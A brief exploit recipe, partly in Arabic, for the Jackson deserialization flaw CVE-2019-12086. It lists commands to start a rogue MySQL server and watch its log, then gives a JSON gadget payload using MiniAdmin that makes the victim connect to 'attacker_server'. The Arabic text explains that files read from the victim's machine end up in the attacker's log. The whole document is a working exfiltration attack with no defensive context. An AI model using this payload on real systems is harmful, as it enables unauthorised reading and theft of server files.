
Jackson إلغاء التسلسل
CVE-2019-12086 jackson unserialize
python rogue_mysql_server.py
tail -f mysql.log
["com.mysql.cj.jdbc.admin.MiniAdmin","jdbc:mysql://attacker_server:port/foo"]
عند إلغاء تسلسل Jackson لسلسلة JSON الخبيثة، سيتصل بخادم MySQL الخبيث، وسيتم كتابة محتوى الملف المقروء في mysql.log للخادم الخبيث.